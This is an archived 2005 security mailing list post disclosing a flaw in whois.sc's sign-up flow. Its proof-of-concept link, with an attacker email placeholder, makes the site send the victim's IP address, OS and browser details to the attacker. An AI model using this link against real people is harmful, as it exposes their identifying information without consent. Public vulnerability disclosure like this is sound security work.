| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu Nov 3 11:09:38 2005 From: unknown.pentester at gmail.com (unknown unknown) Subject: whois.sc not-big-deal hole (2nd post) I just forgot to mention in the previous post that after the victim clicks on the specially-crafted link, the attacker should be able to receive an account sign-up email with the following information about the victim (located at the bottom of the email body): - IP Address - Operating system version - Web browser version The bottom of the email looks like this (some information has been hidden): --------------------------------------------------- NOTE: You received this message because someone from X.X.X.X(Mozilla/X.X (Windows; U; Windows NT X.X; en-US; rv:X.X.X) Gecko/2005XXXX Firefox/X.X.X) requested an account for this email address. If you did not request this account please ignore this message and you will not be contacted again. --------------------------------------------------- PoC: http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=attacker%40gmail.com Replace "attacker%40gmail.com" in the previous link with your own email address (e.g.: myself%40gmail.com) and send it to the victim. Note: the only limitation of this "trick" is that the attacker needs to use a different email address for each attack. This is because whois.sc will set the account activation status to "pending" after requesting the account activation for the first time. Regards, pagvac
Powered by blists - more mailing lists